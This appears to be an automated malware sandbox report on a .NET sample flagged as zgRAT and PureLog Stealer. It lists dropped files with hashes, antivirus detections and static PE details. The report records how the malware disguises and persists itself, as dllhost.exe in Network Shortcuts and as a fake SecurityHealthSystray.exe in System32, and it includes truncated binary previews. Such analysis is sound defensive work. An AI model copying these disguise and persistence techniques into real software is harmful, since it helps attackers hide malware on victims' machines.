Process:	C:\Users\user\Desktop\4Awb1u1GcJ.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1916928
Entropy (8bit):	7.536430435787372
Encrypted:	false
SSDEEP:	24576:nfNh6iTrBgSq+kdkpupwocpF4jGdWWfWanontd7ksYKtAwqgKchGGqGLk6kIv/D5:f3/kGAwaCYO4ngs7wg8UkcX
MD5:	382EAEDC34BFC15B7E749FB8A0CFF600
SHA1:	D8729997725A187120EE95E1D6068586A13AB678
SHA-256:	E864306092DF6D14C7214C505630F0DF5FAAA0F622331EEC1DC9D3841DE2847A
SHA-512:	F2BE10566728F10A1396ABF3115A01D98A5B06D18B94E84ECB6FBB012F1AD3AD588BE84F09CEAFA55BC9FD65A7E6763C68CA67596141C750AE54A2BEBFC5C16B
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 61%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....=g.................8...........V... ...`....@.. ....................................@..................................U..K....`.. ............................................................................ ............... ..H............text...$6... ...8.................. ..`.rsrc... ....`.......:..............@....reloc...............>..............@..B.................V......H...........$..............du..AU.......................................0..........(.... ........8........E....).......M...q...8$...(.... ....~....{....9....& ....8....(.... ....~....{....:....& ....8....(.... ....~....{....:....& ....8z...*...0..'....... ........8........E........................F.......8........~....(9...~....(=... ....<.... ....~....{x...9....& ....8....~....(1... .... .... ....s....~....(5....... ....~....{....9Y...& ....8N...~....9=... ....8:...8I... ..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\4Awb1u1GcJ.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\Desktop\IETDQDzo.log

Download File

Process:	C:\Users\user\Desktop\4Awb1u1GcJ.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 50%
Joe Sandbox View:	Filename: rbCoIEGfDf.exe, Detection: malicious, Browse Filename: LWv5DuboZh.exe, Detection: malicious, Browse Filename: rvNK8fDa0k.exe, Detection: malicious, Browse Filename: RustChecker.exe, Detection: malicious, Browse Filename: KPFv8ATDx0.exe, Detection: malicious, Browse Filename: LzmJLVB41K.exe, Detection: malicious, Browse Filename: T0jSGXdxX5.exe, Detection: malicious, Browse Filename: s5duotgoYD.exe, Detection: malicious, Browse Filename: main.exe, Detection: malicious, Browse Filename: file_1443.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\RrNkXoHQ.log

Download File

Process:	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\YOJaOqPH.log

Download File

Process:	C:\Users\user\Desktop\4Awb1u1GcJ.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\cOkJseIw.log

Download File

Process:	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\ffcd0da4dbcd15

Download File

Process:	C:\Users\user\Desktop\4Awb1u1GcJ.exe
File Type:	ASCII text, with very long lines (639), with no line terminators
Category:	dropped
Size (bytes):	639
Entropy (8bit):	5.900338988773468
Encrypted:	false
SSDEEP:	12:6yMtqn1audPRhumqXIIJHUuCcqTUbsv9SPGKkQy1E0ZQLVIYz7:Rn1audJhuh0uKIRGg0ZQLVzz7
MD5:	2EA27782A0E77FCFD268766EA40DBD10
SHA1:	D1923219733BCDA01D92BEB8AA2CD3D9929A0949
SHA-256:	C767BC6F7D07C4135FDF4D62A46A4652CB64CD0CF62EC2E92FF77952A1BD1BA4
SHA-512:	EFA78DBCEFA35D9317E1F282077227419A1DB7AB45AC7A61D20B9FB5AD39F2B27EBB8F88357BDD107C2CF42E940B7A360B99A00B4E72792C1F7833AC7AEA5602
Malicious:	false
Preview:	03lfQ5jXijOajdNeezgn0WCcsVCHFmOFYkAp6i2Y3psmC5Uww8tJ2Rwd0Jx52bR5UIC8cii56HuKoZZxAQVH3EMGxhyxv7fcYwR32VUNaxMvhlyat94mGKBP55L5uvK9mSw2Ig4p5HqG1bjLsXEwC2VOuB77KYcpnNIPz6SMEPr9d5YeW9NXqY6u6iHGi7egoBcnTUWvE1rxLWuzndlKLF8PRYSRzMnHuKUbduKBnbSzqIijxScFWTVjDNW4BF62NkCBCSW3SjhuwIiJzsdgtiuazvYPXQAifalGFhhf6jxxwkw4oNFSmZIpzlMQ3GfCi8PVgcDRL7kJu7oO8elKLs6FS6RdVQl0EvOxVbXMJxHoz84177SZfU00CJDkKj64WuF9s03hGYAYlSQTCZgY8MUt4YvLXxBk1NSF24IGEuSGTcPu3tivDi5JZWFUFrJTXahXAKbHQZTN3OZbJARoPQhSRIqfzyAWk9t351utSaenOrQK7nKFZfEG3OG1e5SbZ6m4ffgSQiVyv3Ej1fiLn57F4m9ru2OXICORFVpbH2z0KQU9JgA8XGxd9h92gyhXU8pspxeg0GDvGG4oRAhN2PABOuShWx5TVbgMkmTWCeIQDCX2mVkfQTeE7nd5e7J

C:\Users\user\Desktop\greisgmx.log

Download File

Process:	C:\Users\user\Desktop\4Awb1u1GcJ.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\kaHiFPLi.log

Download File

Process:	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\pnhXwyoY.log

Download File

Process:	C:\Users\user\Desktop\4Awb1u1GcJ.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\uJayprRQ.log

Download File

Process:	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

C:\Windows\System32\CSC3F9C54C7EA774D8CB8E83128B6DCF481.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	1224
Entropy (8bit):	4.435108676655666
Encrypted:	false
SSDEEP:	24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
MD5:	931E1E72E561761F8A74F57989D1EA0A
SHA1:	B66268B9D02EC855EB91A5018C43049B4458AB16
SHA-256:	093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
SHA-512:	1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
Malicious:	false
Preview:	.... ...........................\|...<...............0...........\|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi

C:\Windows\System32\SecurityHealthSystray.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	4608
Entropy (8bit):	3.940094909538082
Encrypted:	false
SSDEEP:	48:6dpDPtuM7Jt8Bs3FJsdcV4MKe27EJIvqBHmOulajfqXSfbNtm:kPtPc+Vx9MEavkAcjRzNt
MD5:	16DA8933BACC7DA4A6736F4D91A388FB
SHA1:	EA130AF12916B67BF58ABF6DC73ADE64905B599B
SHA-256:	FDD034738E6435CCA223AD72D0018AD277BF2200D99C29C7BC10B83FB1337573
SHA-512:	DF287C9F63A41CB2C5E7567278385D1A34974A67DB13ACE855EBD216EEDC60A04498329995BC89532A6FAADB95770E0C427B945908E655D78D9800865BF704A5
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Eg.............................'... ...@....@.. ....................................@.................................D'..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!................................................................(.....0..!.......r...pre..p.{....(....(....&..&......................0..........ri..p(....&..&......................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(......(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.........#GUID....... ...#Blob...........WU........%3................................................................

\Device\Null

Download File

Process:	C:\Windows\System32\PING.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	502
Entropy (8bit):	4.613865166769504
Encrypted:	false
SSDEEP:	12:P+5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:wdUOAokItULVDv
MD5:	0C62BCEEB58984C75AB308E22503AA70
SHA1:	CF8D1698639026FAB48CA3F1EE801976E3FEEFA4
SHA-256:	F7D1BFF19697A4FBA3F60CCFC17FD4A9FF9CDB93F8E3074D550DA1610FA6389D
SHA-512:	931367FECA43800FA9A8B899CADCF6FCE02D9A331F5F38B1F4DBAB24272F04FA75C39DC5393D581EA05E096190F9BD451783E8865C6475A83FA4D247371E71DC
Malicious:	false
Preview:	..Pinging 051829 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.536430435787372
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	4Awb1u1GcJ.exe
File size:	1'916'928 bytes
MD5:	382eaedc34bfc15b7e749fb8a0cff600
SHA1:	d8729997725a187120ee95e1d6068586a13ab678
SHA256:	e864306092df6d14c7214c505630f0df5faaa0f622331eec1dc9d3841de2847a
SHA512:	f2be10566728f10a1396abf3115a01d98a5b06d18b94e84ecb6fbb012f1ad3ad588be84f09ceafa55bc9fd65a7e6763c68ca67596141c750ae54a2bebfc5c16b
SSDEEP:	24576:nfNh6iTrBgSq+kdkpupwocpF4jGdWWfWanontd7ksYKtAwqgKchGGqGLk6kIv/D5:f3/kGAwaCYO4ngs7wg8UkcX
TLSH:	6895AE16A5924E32C2A2573186A7053F5391C7267912EF0B7D1F21D3691BBF18AB32F3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....=g.................8...........V... ...`....@.. ....................................@................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x5d561e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x673DD9CE [Wed Nov 20 12:45:02 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1d55d0	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1d6000	0x320	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x1d8000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x1d3624	0x1d3800	7b7f1773cf006a1fd7fecd4050ffa289	False	0.7787830046791444	data	7.539895495432321	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
